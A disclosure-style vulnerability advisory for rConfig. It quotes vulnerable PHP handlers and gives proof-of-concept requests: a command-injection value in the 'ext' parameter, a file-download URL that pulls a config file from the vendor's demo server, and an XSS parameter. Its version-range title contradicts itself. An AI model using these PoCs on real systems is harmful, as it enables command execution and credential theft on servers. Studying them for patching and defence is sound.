rConfig 3.1.1 <= 2.0 RCE & AFD & XSS Multiple Vulnerabilities http://www.rconfig.com/ rConfig is a free open source network device configuration management utility for network engineers to take frequent configuration snapshots of their network devices. rConfig is unique, because you choose what commands you want to run against your devices. Simply configure rConfig with the list of commands you wish to apply to a category of devices, and add devices to the category. Create a scheduled task, and rConfig will do the rest. rConfig Version 3 now has a Configuration Compliance Management utility to enable you to monitor device configurations for policy compliance. Vulnerabilities: =========================================================================== =========================================================================== 1. Remote Command Execution File: lib/ajaxHandlers/ajaxArchiveFiles.php <?php $mainPath = $_GET['path']; $archiveMainPath = $mainPath . "archive/"; $ext = "*." . $_GET['ext']; $fullpath = $mainPath . $ext; // create and archive dir if not already created if (!is_dir($archiveMainPath)) { mkdir("$archiveMainPath"); } $today = date("Ymd"); $commandString = "sudo -u apache zip -r -j " . $archiveMainPath . "filename" . $today . ".zip " . $mainPath . $ext; exec($commandString); PoC: /rconfig/www/lib/ajaxHandlers/ajaxArchiveFiles.php?path=/&ext=|%20id 2. Arbitrary file download File: /www/lib/crud/downloadFile.php <?php // from here http://www.finalwebsites.com/forums/topic/php-file-download $path = $_SERVER['DOCUMENT_ROOT'] . "/path2file/"; // change the path to fit your websites document structure $fullPath = $_GET['download_file']; if ($fd = fopen($fullPath, "r")) { $fsize = filesize($fullPath); $path_parts = pathinfo($fullPath); $ext = strtolower($path_parts["extension"]); switch ($ext) { case "pdf": header("Content-type: application/pdf"); // add here more headers for diff. extensions header("Content-Disposition: attachment; filename="" . $path_parts["basename"] . """); // use 'attachment' to force a download break; default; header("Content-type: application/octet-stream"); header("Content-Disposition: filename="" . $path_parts["basename"] . """); } header("Content-length: $fsize"); header("Cache-control: private"); //use this to open files directly while (!feof($fd)) { $buffer = fread($fd, 2048); echo $buffer; } } fclose($fd); exit; // example: place this kind of link into the document where the file download is offered: // <a href="download.php?download_file=some_file.pdf">Download here</a> ?> PoC v2: http://demo.rconfig.com/v2/www/lib/crud/downloadFile.php?download_file=/home/r560544/demo/v2/config/config.inc.php 3. XSS: http://demo.rconfig.com/v2/www/devicemgmt.php?deviceId=168&device=XSS 4. Arbitrary file read File: lib/ajaxHandlers/ajaxGetFileByPath.php <?php // used to retrive contents of file specified in JS in devicemgmt.php $filepath = $_GET['path']; if (file_exists($filepath)) { $fileArr = file($filepath); } else { $fileArr = 'Failed'; } echo json_encode($fileArr); ?> 5. Arbitrary File Deletion File: lib/ajaxHandlers/ajaxDeleteAllLoggingFiles.php <?php $path = $_GET['path']; $ext = "*." . $_GET['ext']; $fullpath = $path . $ext; foreach (glob($fullpath) as $v) { unlink($v); } $fileCount = count(glob($path . '*.' . $ext)); if ($fileCount > 0) { $response = json_encode(array( 'failure' => true )); } else { $response = json_encode(array( 'success' => true )); } echo $response; ?> (there is much more) =========================================================================== ===========================================================================